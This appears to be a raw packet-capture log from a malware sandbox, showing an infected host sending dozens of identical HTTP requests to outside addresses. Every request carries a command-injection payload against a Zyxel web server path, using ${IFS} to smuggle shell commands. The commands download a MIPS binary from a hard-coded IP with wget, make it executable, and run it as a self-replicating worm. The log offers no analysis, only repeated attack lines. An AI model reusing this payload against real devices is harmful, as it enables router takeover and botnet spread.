                                                Jan 29, 2024 07:08:08.752438068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9522192.168.2.2354868112.138.151.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.752470016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9523192.168.2.2340590192.178.167.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.752545118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9524192.168.2.23453222.141.129.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.752567053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9525192.168.2.235028234.252.180.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.752630949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9526192.168.2.2360332206.134.226.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.752657890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9527192.168.2.2341460223.188.21.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.752715111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9528192.168.2.234879680.154.252.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.752737999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9529192.168.2.23539001.135.68.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.752779007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9530192.168.2.2338480138.237.43.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.752809048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9531192.168.2.2354554136.24.107.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.752882004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9532192.168.2.2333280110.88.52.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.752901077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9533192.168.2.235196045.163.17.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.752938986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9534192.168.2.2350218164.227.214.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.752989054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9535192.168.2.2348442142.216.36.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.753040075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9536192.168.2.235895289.84.223.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.753062963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9537192.168.2.2337652223.41.28.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.753108025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9538192.168.2.2344568174.131.176.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.753166914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9539192.168.2.2359258144.191.229.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.753175020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9540192.168.2.2347998197.43.99.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.753230095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9541192.168.2.233927693.237.77.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.753278017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9542192.168.2.233355844.129.179.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.753304005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9543192.168.2.234588487.142.255.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.753360033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9544192.168.2.2341084181.139.189.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.753376007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9545192.168.2.235115289.16.15.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.753429890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9546192.168.2.235256098.11.90.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.753469944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9547192.168.2.2343536106.59.233.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.753505945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9548192.168.2.23571609.22.134.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.753535032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9549192.168.2.2358060209.213.34.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.753568888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9550192.168.2.2360304129.130.132.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.753619909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9551192.168.2.23422422.76.6.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.753654003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9552192.168.2.2337622165.66.155.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.753675938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9553192.168.2.2359710159.222.117.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.753734112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9554192.168.2.2349286157.152.9.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.753784895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9555192.168.2.233855088.211.22.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.753823042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9556192.168.2.2335474168.110.53.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.753864050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9557192.168.2.234208612.245.245.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.753912926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9558192.168.2.2342164160.8.254.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.753937006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9559192.168.2.2346404222.153.126.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.753973007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9560192.168.2.2343214183.152.168.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.754024029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9561192.168.2.2342022165.51.140.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.754050016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9562192.168.2.2354824147.81.103.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.754095078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9563192.168.2.233303217.185.1.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.754136086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9564192.168.2.235741666.45.211.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.754152060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9565192.168.2.234768027.233.154.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.754188061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9566192.168.2.23506042.70.30.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.754221916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9567192.168.2.233584040.22.64.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.754273891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9568192.168.2.233844079.15.129.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.754314899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9569192.168.2.234662227.215.177.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.754353046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9570192.168.2.2352352138.3.230.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.754396915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9571192.168.2.234763035.37.71.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.754415989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9572192.168.2.2345008132.215.70.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.754463911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9573192.168.2.234982260.61.123.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.754518032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9574192.168.2.2355882157.118.51.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.754545927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9575192.168.2.2357536152.246.78.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.754578114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9576192.168.2.2353876166.208.76.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.754626036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9577192.168.2.2346144158.96.182.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.754654884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9578192.168.2.2336926146.62.159.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.754688978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9579192.168.2.2356786191.138.122.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.754724026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9580192.168.2.233815427.111.186.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.754749060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9581192.168.2.235960071.2.53.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.754817963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9582192.168.2.2358148173.205.93.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.754848957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9583192.168.2.23380284.13.126.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.754904985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9584192.168.2.2346262161.239.248.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.754940987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9585192.168.2.2340162194.16.66.138443
                                                TimestampBytes transferredDirectionData
